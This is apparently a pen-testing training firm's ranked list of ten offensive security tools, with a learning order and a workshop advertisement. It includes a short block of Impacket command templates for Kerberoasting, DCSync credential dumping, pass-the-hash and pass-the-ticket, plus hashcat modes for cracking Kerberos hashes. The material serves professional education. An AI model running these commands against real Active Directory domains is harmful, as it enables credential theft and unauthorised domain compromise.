Tooling is the easy part. The hard part is knowing what to reach for and when. This is the toolkit our pen-test consultants actually use across BFSI and government engagements in 2026 — ranked by frequency of use, with notes on what each tool replaced and what's likely to replace it next.
1. Burp Suite Pro — the AppSec workhorse
Burp Suite is to web pentesting what AutoCAD is to architecture. Pro license (~₹35,000/year) is non-negotiable for serious work. Manual proxy intercept, Repeater, Intruder, Collaborator and the BApp store cover 95% of web testing use cases. Master it before anything else.
2. Nmap — the network reconnaissance reference
27 years old and still the network scanner you open first. The NSE script library is the underrated superpower — smb-vuln-ms17-010, ssl-enum-ciphers and http-enum each save hours per engagement. Free, ubiquitous, mandatory.
3. Metasploit Framework — the exploitation library
Metasploit's modern role isn't 'point and click pwn' — it's a curated library of working exploits and post-exploitation modules. msfvenom for payload generation, auxiliary scanners for credential spraying, and the well-tested exploit modules for known CVEs. Skip the temptation to use it as a crutch on OSCP.
4. BloodHound — the Active Directory map
If your engagement involves Active Directory (most do), BloodHound is your second tool after Nmap. SharpHound for collection from Windows, bloodhound-python for collection from Linux, and the BloodHound GUI for visualizing attack paths. Without it, AD compromise is guesswork.
5. Impacket — the AD attack swiss-army knife
# Enumerate users
impacket-samrdump <user>:<pass>@<DC>
# Kerberoast
impacket-GetUserSPNs corp.local/<user>:<pass> -dc-ip <DC> -request
# DCSync
impacket-secretsdump -just-dc-user krbtgt corp.local/<admin>:<pass>@<DC>
# Pass-the-hash
impacket-psexec corp.local/<user>@<host> -hashes :<NTLM>
# Pass-the-ticket
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass <host>.corp.local6. CrackMapExec / NetExec — AD enumeration at scale
NetExec (the maintained successor to CrackMapExec) is what you reach for when you need to spray credentials, enumerate shares, run remote commands, or harvest password policies across a large internal network. The successor is faster and includes modules CrackMapExec didn't have.
7. Hashcat — the password-cracking standard
GPU-accelerated, supports every modern hash format including the ones you'll see in Kerberoasting (mode 13100), AS-REP (mode 18200), NTLMv2 (5600), and Kerberos AES (19700). RTX 4090 cluster cracks an 8-character mixed-case Kerberos hash in hours; weaker hashes fall in seconds.
8. Sliver / Mythic — the modern C2 frameworks
Cobalt Strike is still the gold standard for licensed red teams, but Sliver (open-source, Go-based) and Mythic (Python, modular) have matured into legitimate alternatives. For mature red-team work in 2026, you should be fluent in at least one. Avoid using leaked Cobalt Strike — it's both ethically questionable and easily detected by EDR.
9. Nuclei — templated vulnerability scanning
Nuclei runs YAML-based vulnerability templates against targets at high speed. Maintained by ProjectDiscovery, the public template library covers thousands of CVEs and misconfigurations. Indispensable for asset surveys and bug-bounty hunting; complements (not replaces) manual web testing.
10. Mimikatz — the credential extraction reference
Whether you use Mimikatz directly or via tools that wrap it (impacket, secretsdump, lsassy), understanding what Mimikatz does is essential to AD compromise. With LSASS protection enabled in Windows 11+, the techniques have evolved — but the concepts (pass-the-hash, OverPass-the-hash, Golden Ticket) remain the same.
Suggested learning order for newcomers
- Nmap — start here, every engagement
- Burp Suite — most engagement value per hour invested
- Metasploit — but as a library, not a magic wand
- Impacket + BloodHound — once you have AD-aware engagements
- Hashcat — when you need to crack what you've stolen
- Nuclei — when you need to scale vulnerability discovery
- Sliver / Mythic — once you need persistent operator-level C2
Macksofy's hands-on pentest tools workshop is one of several hands-on tracks Macksofy delivers across India and the UAE. CERT-In empanelled, OffSec/EC-Council authorized, with weekend cohorts and corporate batches.